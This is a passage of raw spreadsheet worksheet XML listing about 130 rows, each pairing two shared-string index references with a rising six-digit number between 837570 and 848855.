      <c r="C21747" s="15">
        <v>837570</v>
      </c>
    </row>
    <row r="21748" spans="1:3">
      <c r="A21748" s="28" t="s">
        <v>26974</v>
      </c>
      <c r="B21748" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21748" s="15">
        <v>837580</v>
      </c>
    </row>
    <row r="21749" spans="1:3">
      <c r="A21749" s="28" t="s">
        <v>26974</v>
      </c>
      <c r="B21749" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21749" s="15">
        <v>837590</v>
      </c>
    </row>
    <row r="21750" spans="1:3">
      <c r="A21750" s="28" t="s">
        <v>26974</v>
      </c>
      <c r="B21750" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21750" s="15">
        <v>837626</v>
      </c>
    </row>
    <row r="21751" spans="1:3">
      <c r="A21751" s="28" t="s">
        <v>26974</v>
      </c>
      <c r="B21751" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21751" s="15">
        <v>837645</v>
      </c>
    </row>
    <row r="21752" spans="1:3">
      <c r="A21752" s="28" t="s">
        <v>26974</v>
      </c>
      <c r="B21752" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21752" s="15">
        <v>837660</v>
      </c>
    </row>
    <row r="21753" spans="1:3">
      <c r="A21753" s="28" t="s">
        <v>26974</v>
      </c>
      <c r="B21753" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21753" s="15">
        <v>837667</v>
      </c>
    </row>
    <row r="21754" spans="1:3">
      <c r="A21754" s="28" t="s">
        <v>26974</v>
      </c>
      <c r="B21754" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21754" s="15">
        <v>837670</v>
      </c>
    </row>
    <row r="21755" spans="1:3">
      <c r="A21755" s="28" t="s">
        <v>26974</v>
      </c>
      <c r="B21755" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21755" s="15">
        <v>837674</v>
      </c>
    </row>
    <row r="21756" spans="1:3">
      <c r="A21756" s="28" t="s">
        <v>26974</v>
      </c>
      <c r="B21756" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21756" s="15">
        <v>837845</v>
      </c>
    </row>
    <row r="21757" spans="1:3">
      <c r="A21757" s="28" t="s">
        <v>26975</v>
      </c>
      <c r="B21757" s="14" t="s">
        <v>17465</v>
      </c>
      <c r="C21757" s="15">
        <v>838000</v>
      </c>
    </row>
    <row r="21758" spans="1:3">
      <c r="A21758" s="28" t="s">
        <v>26975</v>
      </c>
      <c r="B21758" s="14" t="s">
        <v>17465</v>
      </c>
      <c r="C21758" s="15">
        <v>838290</v>
      </c>
    </row>
    <row r="21759" spans="1:3">
      <c r="A21759" s="28" t="s">
        <v>26975</v>
      </c>
      <c r="B21759" s="14" t="s">
        <v>17465</v>
      </c>
      <c r="C21759" s="15">
        <v>838460</v>
      </c>
    </row>
    <row r="21760" spans="1:3">
      <c r="A21760" s="28" t="s">
        <v>26975</v>
      </c>
      <c r="B21760" s="14" t="s">
        <v>17465</v>
      </c>
      <c r="C21760" s="15">
        <v>838480</v>
      </c>
    </row>
    <row r="21761" spans="1:3">
      <c r="A21761" s="28" t="s">
        <v>26975</v>
      </c>
      <c r="B21761" s="14" t="s">
        <v>17465</v>
      </c>
      <c r="C21761" s="15">
        <v>838490</v>
      </c>
    </row>
    <row r="21762" spans="1:3">
      <c r="A21762" s="28" t="s">
        <v>26975</v>
      </c>
      <c r="B21762" s="14" t="s">
        <v>17465</v>
      </c>
      <c r="C21762" s="15">
        <v>838545</v>
      </c>
    </row>
    <row r="21763" spans="1:3">
      <c r="A21763" s="28" t="s">
        <v>26975</v>
      </c>
      <c r="B21763" s="14" t="s">
        <v>17465</v>
      </c>
      <c r="C21763" s="15">
        <v>838550</v>
      </c>
    </row>
    <row r="21764" spans="1:3">
      <c r="A21764" s="28" t="s">
        <v>26975</v>
      </c>
      <c r="B21764" s="14" t="s">
        <v>17465</v>
      </c>
      <c r="C21764" s="15">
        <v>838560</v>
      </c>
    </row>
    <row r="21765" spans="1:3">
      <c r="A21765" s="28" t="s">
        <v>26975</v>
      </c>
      <c r="B21765" s="14" t="s">
        <v>17465</v>
      </c>
      <c r="C21765" s="15">
        <v>838570</v>
      </c>
    </row>
    <row r="21766" spans="1:3">
      <c r="A21766" s="28" t="s">
        <v>26975</v>
      </c>
      <c r="B21766" s="14" t="s">
        <v>17465</v>
      </c>
      <c r="C21766" s="15">
        <v>838580</v>
      </c>
    </row>
    <row r="21767" spans="1:3">
      <c r="A21767" s="28" t="s">
        <v>26975</v>
      </c>
      <c r="B21767" s="14" t="s">
        <v>17465</v>
      </c>
      <c r="C21767" s="15">
        <v>838590</v>
      </c>
    </row>
    <row r="21768" spans="1:3">
      <c r="A21768" s="28" t="s">
        <v>26975</v>
      </c>
      <c r="B21768" s="14" t="s">
        <v>17465</v>
      </c>
      <c r="C21768" s="15">
        <v>838626</v>
      </c>
    </row>
    <row r="21769" spans="1:3">
      <c r="A21769" s="28" t="s">
        <v>26975</v>
      </c>
      <c r="B21769" s="14" t="s">
        <v>17465</v>
      </c>
      <c r="C21769" s="15">
        <v>838645</v>
      </c>
    </row>
    <row r="21770" spans="1:3">
      <c r="A21770" s="28" t="s">
        <v>26975</v>
      </c>
      <c r="B21770" s="14" t="s">
        <v>17465</v>
      </c>
      <c r="C21770" s="15">
        <v>838660</v>
      </c>
    </row>
    <row r="21771" spans="1:3">
      <c r="A21771" s="28" t="s">
        <v>26975</v>
      </c>
      <c r="B21771" s="14" t="s">
        <v>17465</v>
      </c>
      <c r="C21771" s="15">
        <v>838667</v>
      </c>
    </row>
    <row r="21772" spans="1:3">
      <c r="A21772" s="28" t="s">
        <v>26975</v>
      </c>
      <c r="B21772" s="14" t="s">
        <v>17465</v>
      </c>
      <c r="C21772" s="15">
        <v>838670</v>
      </c>
    </row>
    <row r="21773" spans="1:3">
      <c r="A21773" s="28" t="s">
        <v>26975</v>
      </c>
      <c r="B21773" s="14" t="s">
        <v>17465</v>
      </c>
      <c r="C21773" s="15">
        <v>838674</v>
      </c>
    </row>
    <row r="21774" spans="1:3">
      <c r="A21774" s="28" t="s">
        <v>26975</v>
      </c>
      <c r="B21774" s="14" t="s">
        <v>17465</v>
      </c>
      <c r="C21774" s="15">
        <v>838755</v>
      </c>
    </row>
    <row r="21775" spans="1:3">
      <c r="A21775" s="28" t="s">
        <v>26975</v>
      </c>
      <c r="B21775" s="14" t="s">
        <v>17465</v>
      </c>
      <c r="C21775" s="15">
        <v>838767</v>
      </c>
    </row>
    <row r="21776" spans="1:3">
      <c r="A21776" s="28" t="s">
        <v>26975</v>
      </c>
      <c r="B21776" s="14" t="s">
        <v>17465</v>
      </c>
      <c r="C21776" s="15">
        <v>838845</v>
      </c>
    </row>
    <row r="21777" spans="1:3">
      <c r="A21777" s="28" t="s">
        <v>26975</v>
      </c>
      <c r="B21777" s="14" t="s">
        <v>17465</v>
      </c>
      <c r="C21777" s="15">
        <v>838867</v>
      </c>
    </row>
    <row r="21778" spans="1:3">
      <c r="A21778" s="28" t="s">
        <v>26976</v>
      </c>
      <c r="B21778" s="14" t="s">
        <v>17466</v>
      </c>
      <c r="C21778" s="15">
        <v>839290</v>
      </c>
    </row>
    <row r="21779" spans="1:3">
      <c r="A21779" s="28" t="s">
        <v>26976</v>
      </c>
      <c r="B21779" s="14" t="s">
        <v>17466</v>
      </c>
      <c r="C21779" s="15">
        <v>839460</v>
      </c>
    </row>
    <row r="21780" spans="1:3">
      <c r="A21780" s="28" t="s">
        <v>26976</v>
      </c>
      <c r="B21780" s="14" t="s">
        <v>17466</v>
      </c>
      <c r="C21780" s="15">
        <v>839480</v>
      </c>
    </row>
    <row r="21781" spans="1:3">
      <c r="A21781" s="28" t="s">
        <v>26976</v>
      </c>
      <c r="B21781" s="14" t="s">
        <v>17466</v>
      </c>
      <c r="C21781" s="15">
        <v>839490</v>
      </c>
    </row>
    <row r="21782" spans="1:3">
      <c r="A21782" s="28" t="s">
        <v>26977</v>
      </c>
      <c r="B21782" s="14" t="s">
        <v>17466</v>
      </c>
      <c r="C21782" s="15">
        <v>839550</v>
      </c>
    </row>
    <row r="21783" spans="1:3">
      <c r="A21783" s="28" t="s">
        <v>26976</v>
      </c>
      <c r="B21783" s="14" t="s">
        <v>17466</v>
      </c>
      <c r="C21783" s="15">
        <v>839560</v>
      </c>
    </row>
    <row r="21784" spans="1:3">
      <c r="A21784" s="28" t="s">
        <v>26976</v>
      </c>
      <c r="B21784" s="14" t="s">
        <v>17466</v>
      </c>
      <c r="C21784" s="15">
        <v>839570</v>
      </c>
    </row>
    <row r="21785" spans="1:3">
      <c r="A21785" s="28" t="s">
        <v>26976</v>
      </c>
      <c r="B21785" s="14" t="s">
        <v>17466</v>
      </c>
      <c r="C21785" s="15">
        <v>839580</v>
      </c>
    </row>
    <row r="21786" spans="1:3">
      <c r="A21786" s="28" t="s">
        <v>26976</v>
      </c>
      <c r="B21786" s="14" t="s">
        <v>17466</v>
      </c>
      <c r="C21786" s="15">
        <v>839590</v>
      </c>
    </row>
    <row r="21787" spans="1:3">
      <c r="A21787" s="28" t="s">
        <v>26976</v>
      </c>
      <c r="B21787" s="14" t="s">
        <v>17466</v>
      </c>
      <c r="C21787" s="15">
        <v>839660</v>
      </c>
    </row>
    <row r="21788" spans="1:3">
      <c r="A21788" s="28" t="s">
        <v>26976</v>
      </c>
      <c r="B21788" s="14" t="s">
        <v>17466</v>
      </c>
      <c r="C21788" s="15">
        <v>839667</v>
      </c>
    </row>
    <row r="21789" spans="1:3">
      <c r="A21789" s="28" t="s">
        <v>26976</v>
      </c>
      <c r="B21789" s="14" t="s">
        <v>17466</v>
      </c>
      <c r="C21789" s="15">
        <v>839670</v>
      </c>
    </row>
    <row r="21790" spans="1:3">
      <c r="A21790" s="28" t="s">
        <v>26976</v>
      </c>
      <c r="B21790" s="14" t="s">
        <v>17466</v>
      </c>
      <c r="C21790" s="15">
        <v>839674</v>
      </c>
    </row>
    <row r="21791" spans="1:3">
      <c r="A21791" s="28" t="s">
        <v>26976</v>
      </c>
      <c r="B21791" s="14" t="s">
        <v>17466</v>
      </c>
      <c r="C21791" s="15">
        <v>839755</v>
      </c>
    </row>
    <row r="21792" spans="1:3">
      <c r="A21792" s="28" t="s">
        <v>26976</v>
      </c>
      <c r="B21792" s="14" t="s">
        <v>17466</v>
      </c>
      <c r="C21792" s="15">
        <v>839767</v>
      </c>
    </row>
    <row r="21793" spans="1:3">
      <c r="A21793" s="28" t="s">
        <v>26976</v>
      </c>
      <c r="B21793" s="14" t="s">
        <v>17466</v>
      </c>
      <c r="C21793" s="15">
        <v>839845</v>
      </c>
    </row>
    <row r="21794" spans="1:3">
      <c r="A21794" s="28" t="s">
        <v>26976</v>
      </c>
      <c r="B21794" s="14" t="s">
        <v>17466</v>
      </c>
      <c r="C21794" s="15">
        <v>839855</v>
      </c>
    </row>
    <row r="21795" spans="1:3">
      <c r="A21795" s="28" t="s">
        <v>26976</v>
      </c>
      <c r="B21795" s="14" t="s">
        <v>17466</v>
      </c>
      <c r="C21795" s="15">
        <v>839867</v>
      </c>
    </row>
    <row r="21796" spans="1:3">
      <c r="A21796" s="28" t="s">
        <v>26978</v>
      </c>
      <c r="B21796" s="14" t="s">
        <v>17467</v>
      </c>
      <c r="C21796" s="15">
        <v>840290</v>
      </c>
    </row>
    <row r="21797" spans="1:3">
      <c r="A21797" s="28" t="s">
        <v>26978</v>
      </c>
      <c r="B21797" s="14" t="s">
        <v>17467</v>
      </c>
      <c r="C21797" s="15">
        <v>840555</v>
      </c>
    </row>
    <row r="21798" spans="1:3">
      <c r="A21798" s="28" t="s">
        <v>26978</v>
      </c>
      <c r="B21798" s="14" t="s">
        <v>17467</v>
      </c>
      <c r="C21798" s="15">
        <v>840580</v>
      </c>
    </row>
    <row r="21799" spans="1:3">
      <c r="A21799" s="28" t="s">
        <v>26978</v>
      </c>
      <c r="B21799" s="14" t="s">
        <v>17467</v>
      </c>
      <c r="C21799" s="15">
        <v>840590</v>
      </c>
    </row>
    <row r="21800" spans="1:3">
      <c r="A21800" s="28" t="s">
        <v>26978</v>
      </c>
      <c r="B21800" s="14" t="s">
        <v>17467</v>
      </c>
      <c r="C21800" s="15">
        <v>840667</v>
      </c>
    </row>
    <row r="21801" spans="1:3">
      <c r="A21801" s="28" t="s">
        <v>26978</v>
      </c>
      <c r="B21801" s="14" t="s">
        <v>17467</v>
      </c>
      <c r="C21801" s="15">
        <v>840674</v>
      </c>
    </row>
    <row r="21802" spans="1:3">
      <c r="A21802" s="28" t="s">
        <v>26978</v>
      </c>
      <c r="B21802" s="14" t="s">
        <v>17467</v>
      </c>
      <c r="C21802" s="15">
        <v>840755</v>
      </c>
    </row>
    <row r="21803" spans="1:3">
      <c r="A21803" s="28" t="s">
        <v>26978</v>
      </c>
      <c r="B21803" s="14" t="s">
        <v>17467</v>
      </c>
      <c r="C21803" s="15">
        <v>840767</v>
      </c>
    </row>
    <row r="21804" spans="1:3">
      <c r="A21804" s="28" t="s">
        <v>26978</v>
      </c>
      <c r="B21804" s="14" t="s">
        <v>17467</v>
      </c>
      <c r="C21804" s="15">
        <v>840855</v>
      </c>
    </row>
    <row r="21805" spans="1:3">
      <c r="A21805" s="28" t="s">
        <v>26978</v>
      </c>
      <c r="B21805" s="14" t="s">
        <v>17467</v>
      </c>
      <c r="C21805" s="15">
        <v>840867</v>
      </c>
    </row>
    <row r="21806" spans="1:3">
      <c r="A21806" s="28" t="s">
        <v>26979</v>
      </c>
      <c r="B21806" s="14" t="s">
        <v>17468</v>
      </c>
      <c r="C21806" s="15">
        <v>842290</v>
      </c>
    </row>
    <row r="21807" spans="1:3">
      <c r="A21807" s="28" t="s">
        <v>26979</v>
      </c>
      <c r="B21807" s="14" t="s">
        <v>17468</v>
      </c>
      <c r="C21807" s="15">
        <v>842490</v>
      </c>
    </row>
    <row r="21808" spans="1:3">
      <c r="A21808" s="28" t="s">
        <v>26979</v>
      </c>
      <c r="B21808" s="14" t="s">
        <v>17468</v>
      </c>
      <c r="C21808" s="15">
        <v>842545</v>
      </c>
    </row>
    <row r="21809" spans="1:3">
      <c r="A21809" s="28" t="s">
        <v>26979</v>
      </c>
      <c r="B21809" s="14" t="s">
        <v>17468</v>
      </c>
      <c r="C21809" s="15">
        <v>842555</v>
      </c>
    </row>
    <row r="21810" spans="1:3">
      <c r="A21810" s="28" t="s">
        <v>26979</v>
      </c>
      <c r="B21810" s="14" t="s">
        <v>17468</v>
      </c>
      <c r="C21810" s="15">
        <v>842580</v>
      </c>
    </row>
    <row r="21811" spans="1:3">
      <c r="A21811" s="28" t="s">
        <v>26979</v>
      </c>
      <c r="B21811" s="14" t="s">
        <v>17468</v>
      </c>
      <c r="C21811" s="15">
        <v>842590</v>
      </c>
    </row>
    <row r="21812" spans="1:3">
      <c r="A21812" s="28" t="s">
        <v>26979</v>
      </c>
      <c r="B21812" s="14" t="s">
        <v>17468</v>
      </c>
      <c r="C21812" s="15">
        <v>842645</v>
      </c>
    </row>
    <row r="21813" spans="1:3">
      <c r="A21813" s="28" t="s">
        <v>26979</v>
      </c>
      <c r="B21813" s="14" t="s">
        <v>17468</v>
      </c>
      <c r="C21813" s="15">
        <v>842667</v>
      </c>
    </row>
    <row r="21814" spans="1:3">
      <c r="A21814" s="28" t="s">
        <v>26979</v>
      </c>
      <c r="B21814" s="14" t="s">
        <v>17468</v>
      </c>
      <c r="C21814" s="15">
        <v>842755</v>
      </c>
    </row>
    <row r="21815" spans="1:3">
      <c r="A21815" s="28" t="s">
        <v>26979</v>
      </c>
      <c r="B21815" s="14" t="s">
        <v>17468</v>
      </c>
      <c r="C21815" s="15">
        <v>842767</v>
      </c>
    </row>
    <row r="21816" spans="1:3">
      <c r="A21816" s="28" t="s">
        <v>26979</v>
      </c>
      <c r="B21816" s="14" t="s">
        <v>17468</v>
      </c>
      <c r="C21816" s="15">
        <v>842855</v>
      </c>
    </row>
    <row r="21817" spans="1:3">
      <c r="A21817" s="28" t="s">
        <v>26979</v>
      </c>
      <c r="B21817" s="14" t="s">
        <v>17468</v>
      </c>
      <c r="C21817" s="15">
        <v>842867</v>
      </c>
    </row>
    <row r="21818" spans="1:3">
      <c r="A21818" s="28" t="s">
        <v>26980</v>
      </c>
      <c r="B21818" s="14" t="s">
        <v>13939</v>
      </c>
      <c r="C21818" s="15">
        <v>844290</v>
      </c>
    </row>
    <row r="21819" spans="1:3">
      <c r="A21819" s="28" t="s">
        <v>26981</v>
      </c>
      <c r="B21819" s="14" t="s">
        <v>13939</v>
      </c>
      <c r="C21819" s="15">
        <v>844460</v>
      </c>
    </row>
    <row r="21820" spans="1:3">
      <c r="A21820" s="28" t="s">
        <v>26982</v>
      </c>
      <c r="B21820" s="14" t="s">
        <v>13939</v>
      </c>
      <c r="C21820" s="15">
        <v>844480</v>
      </c>
    </row>
    <row r="21821" spans="1:3">
      <c r="A21821" s="28" t="s">
        <v>26980</v>
      </c>
      <c r="B21821" s="14" t="s">
        <v>13939</v>
      </c>
      <c r="C21821" s="15">
        <v>844490</v>
      </c>
    </row>
    <row r="21822" spans="1:3">
      <c r="A21822" s="28" t="s">
        <v>26980</v>
      </c>
      <c r="B21822" s="14" t="s">
        <v>13939</v>
      </c>
      <c r="C21822" s="15">
        <v>844545</v>
      </c>
    </row>
    <row r="21823" spans="1:3">
      <c r="A21823" s="28" t="s">
        <v>26980</v>
      </c>
      <c r="B21823" s="14" t="s">
        <v>13939</v>
      </c>
      <c r="C21823" s="15">
        <v>844550</v>
      </c>
    </row>
    <row r="21824" spans="1:3">
      <c r="A21824" s="28" t="s">
        <v>26980</v>
      </c>
      <c r="B21824" s="14" t="s">
        <v>13939</v>
      </c>
      <c r="C21824" s="15">
        <v>844555</v>
      </c>
    </row>
    <row r="21825" spans="1:3">
      <c r="A21825" s="28" t="s">
        <v>26980</v>
      </c>
      <c r="B21825" s="14" t="s">
        <v>13939</v>
      </c>
      <c r="C21825" s="15">
        <v>844560</v>
      </c>
    </row>
    <row r="21826" spans="1:3">
      <c r="A21826" s="28" t="s">
        <v>26980</v>
      </c>
      <c r="B21826" s="14" t="s">
        <v>13939</v>
      </c>
      <c r="C21826" s="15">
        <v>844570</v>
      </c>
    </row>
    <row r="21827" spans="1:3">
      <c r="A21827" s="28" t="s">
        <v>26980</v>
      </c>
      <c r="B21827" s="14" t="s">
        <v>13939</v>
      </c>
      <c r="C21827" s="15">
        <v>844580</v>
      </c>
    </row>
    <row r="21828" spans="1:3">
      <c r="A21828" s="28" t="s">
        <v>26980</v>
      </c>
      <c r="B21828" s="14" t="s">
        <v>13939</v>
      </c>
      <c r="C21828" s="15">
        <v>844590</v>
      </c>
    </row>
    <row r="21829" spans="1:3">
      <c r="A21829" s="28" t="s">
        <v>26980</v>
      </c>
      <c r="B21829" s="14" t="s">
        <v>13939</v>
      </c>
      <c r="C21829" s="15">
        <v>844626</v>
      </c>
    </row>
    <row r="21830" spans="1:3">
      <c r="A21830" s="28" t="s">
        <v>26980</v>
      </c>
      <c r="B21830" s="14" t="s">
        <v>13939</v>
      </c>
      <c r="C21830" s="15">
        <v>844645</v>
      </c>
    </row>
    <row r="21831" spans="1:3">
      <c r="A21831" s="28" t="s">
        <v>26980</v>
      </c>
      <c r="B21831" s="14" t="s">
        <v>13939</v>
      </c>
      <c r="C21831" s="15">
        <v>844660</v>
      </c>
    </row>
    <row r="21832" spans="1:3">
      <c r="A21832" s="28" t="s">
        <v>26980</v>
      </c>
      <c r="B21832" s="14" t="s">
        <v>13939</v>
      </c>
      <c r="C21832" s="15">
        <v>844667</v>
      </c>
    </row>
    <row r="21833" spans="1:3">
      <c r="A21833" s="28" t="s">
        <v>26980</v>
      </c>
      <c r="B21833" s="14" t="s">
        <v>13939</v>
      </c>
      <c r="C21833" s="15">
        <v>844670</v>
      </c>
    </row>
    <row r="21834" spans="1:3">
      <c r="A21834" s="28" t="s">
        <v>26980</v>
      </c>
      <c r="B21834" s="14" t="s">
        <v>13939</v>
      </c>
      <c r="C21834" s="15">
        <v>844674</v>
      </c>
    </row>
    <row r="21835" spans="1:3">
      <c r="A21835" s="28" t="s">
        <v>26980</v>
      </c>
      <c r="B21835" s="14" t="s">
        <v>13939</v>
      </c>
      <c r="C21835" s="15">
        <v>844755</v>
      </c>
    </row>
    <row r="21836" spans="1:3">
      <c r="A21836" s="28" t="s">
        <v>26980</v>
      </c>
      <c r="B21836" s="14" t="s">
        <v>13939</v>
      </c>
      <c r="C21836" s="15">
        <v>844767</v>
      </c>
    </row>
    <row r="21837" spans="1:3">
      <c r="A21837" s="28" t="s">
        <v>26980</v>
      </c>
      <c r="B21837" s="14" t="s">
        <v>13939</v>
      </c>
      <c r="C21837" s="15">
        <v>844845</v>
      </c>
    </row>
    <row r="21838" spans="1:3">
      <c r="A21838" s="28" t="s">
        <v>26980</v>
      </c>
      <c r="B21838" s="14" t="s">
        <v>13939</v>
      </c>
      <c r="C21838" s="15">
        <v>844867</v>
      </c>
    </row>
    <row r="21839" spans="1:3">
      <c r="A21839" s="28" t="s">
        <v>26983</v>
      </c>
      <c r="B21839" s="14" t="s">
        <v>17469</v>
      </c>
      <c r="C21839" s="15">
        <v>847290</v>
      </c>
    </row>
    <row r="21840" spans="1:3">
      <c r="A21840" s="28" t="s">
        <v>26983</v>
      </c>
      <c r="B21840" s="14" t="s">
        <v>17469</v>
      </c>
      <c r="C21840" s="15">
        <v>847460</v>
      </c>
    </row>
    <row r="21841" spans="1:3">
      <c r="A21841" s="28" t="s">
        <v>26983</v>
      </c>
      <c r="B21841" s="14" t="s">
        <v>17469</v>
      </c>
      <c r="C21841" s="15">
        <v>847480</v>
      </c>
    </row>
    <row r="21842" spans="1:3">
      <c r="A21842" s="28" t="s">
        <v>26983</v>
      </c>
      <c r="B21842" s="14" t="s">
        <v>17469</v>
      </c>
      <c r="C21842" s="15">
        <v>847490</v>
      </c>
    </row>
    <row r="21843" spans="1:3">
      <c r="A21843" s="28" t="s">
        <v>26983</v>
      </c>
      <c r="B21843" s="14" t="s">
        <v>17469</v>
      </c>
      <c r="C21843" s="15">
        <v>847545</v>
      </c>
    </row>
    <row r="21844" spans="1:3">
      <c r="A21844" s="28" t="s">
        <v>26983</v>
      </c>
      <c r="B21844" s="14" t="s">
        <v>17469</v>
      </c>
      <c r="C21844" s="15">
        <v>847550</v>
      </c>
    </row>
    <row r="21845" spans="1:3">
      <c r="A21845" s="28" t="s">
        <v>26983</v>
      </c>
      <c r="B21845" s="14" t="s">
        <v>17469</v>
      </c>
      <c r="C21845" s="15">
        <v>847560</v>
      </c>
    </row>
    <row r="21846" spans="1:3">
      <c r="A21846" s="28" t="s">
        <v>26983</v>
      </c>
      <c r="B21846" s="14" t="s">
        <v>17469</v>
      </c>
      <c r="C21846" s="15">
        <v>847570</v>
      </c>
    </row>
    <row r="21847" spans="1:3">
      <c r="A21847" s="28" t="s">
        <v>26983</v>
      </c>
      <c r="B21847" s="14" t="s">
        <v>17469</v>
      </c>
      <c r="C21847" s="15">
        <v>847580</v>
      </c>
    </row>
    <row r="21848" spans="1:3">
      <c r="A21848" s="28" t="s">
        <v>26983</v>
      </c>
      <c r="B21848" s="14" t="s">
        <v>17469</v>
      </c>
      <c r="C21848" s="15">
        <v>847590</v>
      </c>
    </row>
    <row r="21849" spans="1:3">
      <c r="A21849" s="28" t="s">
        <v>26983</v>
      </c>
      <c r="B21849" s="14" t="s">
        <v>17469</v>
      </c>
      <c r="C21849" s="15">
        <v>847645</v>
      </c>
    </row>
    <row r="21850" spans="1:3">
      <c r="A21850" s="28" t="s">
        <v>26983</v>
      </c>
      <c r="B21850" s="14" t="s">
        <v>17469</v>
      </c>
      <c r="C21850" s="15">
        <v>847660</v>
      </c>
    </row>
    <row r="21851" spans="1:3">
      <c r="A21851" s="28" t="s">
        <v>26983</v>
      </c>
      <c r="B21851" s="14" t="s">
        <v>17469</v>
      </c>
      <c r="C21851" s="15">
        <v>847667</v>
      </c>
    </row>
    <row r="21852" spans="1:3">
      <c r="A21852" s="28" t="s">
        <v>26983</v>
      </c>
      <c r="B21852" s="14" t="s">
        <v>17469</v>
      </c>
      <c r="C21852" s="15">
        <v>847670</v>
      </c>
    </row>
    <row r="21853" spans="1:3">
      <c r="A21853" s="28" t="s">
        <v>26983</v>
      </c>
      <c r="B21853" s="14" t="s">
        <v>17469</v>
      </c>
      <c r="C21853" s="15">
        <v>847674</v>
      </c>
    </row>
    <row r="21854" spans="1:3">
      <c r="A21854" s="28" t="s">
        <v>26983</v>
      </c>
      <c r="B21854" s="14" t="s">
        <v>17469</v>
      </c>
      <c r="C21854" s="15">
        <v>847755</v>
      </c>
    </row>
    <row r="21855" spans="1:3">
      <c r="A21855" s="28" t="s">
        <v>26983</v>
      </c>
      <c r="B21855" s="14" t="s">
        <v>17469</v>
      </c>
      <c r="C21855" s="15">
        <v>847767</v>
      </c>
    </row>
    <row r="21856" spans="1:3">
      <c r="A21856" s="28" t="s">
        <v>26983</v>
      </c>
      <c r="B21856" s="14" t="s">
        <v>17469</v>
      </c>
      <c r="C21856" s="15">
        <v>847845</v>
      </c>
    </row>
    <row r="21857" spans="1:3">
      <c r="A21857" s="28" t="s">
        <v>26983</v>
      </c>
      <c r="B21857" s="14" t="s">
        <v>17469</v>
      </c>
      <c r="C21857" s="15">
        <v>847855</v>
      </c>
    </row>
    <row r="21858" spans="1:3">
      <c r="A21858" s="28" t="s">
        <v>26984</v>
      </c>
      <c r="B21858" s="14" t="s">
        <v>17470</v>
      </c>
      <c r="C21858" s="15">
        <v>848290</v>
      </c>
    </row>
    <row r="21859" spans="1:3">
      <c r="A21859" s="28" t="s">
        <v>26984</v>
      </c>
      <c r="B21859" s="14" t="s">
        <v>17470</v>
      </c>
      <c r="C21859" s="15">
        <v>848460</v>
      </c>
    </row>
    <row r="21860" spans="1:3">
      <c r="A21860" s="28" t="s">
        <v>26984</v>
      </c>
      <c r="B21860" s="14" t="s">
        <v>17470</v>
      </c>
      <c r="C21860" s="15">
        <v>848480</v>
      </c>
    </row>
    <row r="21861" spans="1:3">
      <c r="A21861" s="28" t="s">
        <v>26984</v>
      </c>
      <c r="B21861" s="14" t="s">
        <v>17470</v>
      </c>
      <c r="C21861" s="15">
        <v>848490</v>
      </c>
    </row>
    <row r="21862" spans="1:3">
      <c r="A21862" s="28" t="s">
        <v>26984</v>
      </c>
      <c r="B21862" s="14" t="s">
        <v>17470</v>
      </c>
      <c r="C21862" s="15">
        <v>848545</v>
      </c>
    </row>
    <row r="21863" spans="1:3">
      <c r="A21863" s="28" t="s">
        <v>26984</v>
      </c>
      <c r="B21863" s="14" t="s">
        <v>17470</v>
      </c>
      <c r="C21863" s="15">
        <v>848550</v>
      </c>
    </row>
    <row r="21864" spans="1:3">
      <c r="A21864" s="28" t="s">
        <v>26984</v>
      </c>
      <c r="B21864" s="14" t="s">
        <v>17470</v>
      </c>
      <c r="C21864" s="15">
        <v>848560</v>
      </c>
    </row>
    <row r="21865" spans="1:3">
      <c r="A21865" s="28" t="s">
        <v>26984</v>
      </c>
      <c r="B21865" s="14" t="s">
        <v>17470</v>
      </c>
      <c r="C21865" s="15">
        <v>848570</v>
      </c>
    </row>
    <row r="21866" spans="1:3">
      <c r="A21866" s="28" t="s">
        <v>26984</v>
      </c>
      <c r="B21866" s="14" t="s">
        <v>17470</v>
      </c>
      <c r="C21866" s="15">
        <v>848580</v>
      </c>
    </row>
    <row r="21867" spans="1:3">
      <c r="A21867" s="28" t="s">
        <v>26984</v>
      </c>
      <c r="B21867" s="14" t="s">
        <v>17470</v>
      </c>
      <c r="C21867" s="15">
        <v>848590</v>
      </c>
    </row>
    <row r="21868" spans="1:3">
      <c r="A21868" s="28" t="s">
        <v>26984</v>
      </c>
      <c r="B21868" s="14" t="s">
        <v>17470</v>
      </c>
      <c r="C21868" s="15">
        <v>848626</v>
      </c>
    </row>
    <row r="21869" spans="1:3">
      <c r="A21869" s="28" t="s">
        <v>26984</v>
      </c>
      <c r="B21869" s="14" t="s">
        <v>17470</v>
      </c>
      <c r="C21869" s="15">
        <v>848660</v>
      </c>
    </row>
    <row r="21870" spans="1:3">
      <c r="A21870" s="28" t="s">
        <v>26984</v>
      </c>
      <c r="B21870" s="14" t="s">
        <v>17470</v>
      </c>
      <c r="C21870" s="15">
        <v>848667</v>
      </c>
    </row>
    <row r="21871" spans="1:3">
      <c r="A21871" s="28" t="s">
        <v>26984</v>
      </c>
      <c r="B21871" s="14" t="s">
        <v>17470</v>
      </c>
      <c r="C21871" s="15">
        <v>848670</v>
      </c>
    </row>
    <row r="21872" spans="1:3">
      <c r="A21872" s="28" t="s">
        <v>26984</v>
      </c>
      <c r="B21872" s="14" t="s">
        <v>17470</v>
      </c>
      <c r="C21872" s="15">
        <v>848674</v>
      </c>
    </row>
    <row r="21873" spans="1:3">
      <c r="A21873" s="28" t="s">
        <v>26984</v>
      </c>
      <c r="B21873" s="14" t="s">
        <v>17470</v>
      </c>
      <c r="C21873" s="15">
        <v>848755</v>
      </c>
    </row>
    <row r="21874" spans="1:3">
      <c r="A21874" s="28" t="s">
        <v>26984</v>
      </c>
      <c r="B21874" s="14" t="s">
        <v>17470</v>
      </c>
      <c r="C21874" s="15">
        <v>848767</v>
      </c>
    </row>
    <row r="21875" spans="1:3">
      <c r="A21875" s="28" t="s">
        <v>26984</v>
      </c>
      <c r="B21875" s="14" t="s">
        <v>17470</v>
      </c>
      <c r="C21875" s="15">
        <v>848845</v>
      </c>
    </row>
    <row r="21876" spans="1:3">
      <c r="A21876" s="28" t="s">
        <v>26984</v>
      </c>
      <c r="B21876" s="14" t="s">
        <v>17470</v>
      </c>
      <c r="C21876" s="15">
        <v>848855</v>
      </c>
    </row>
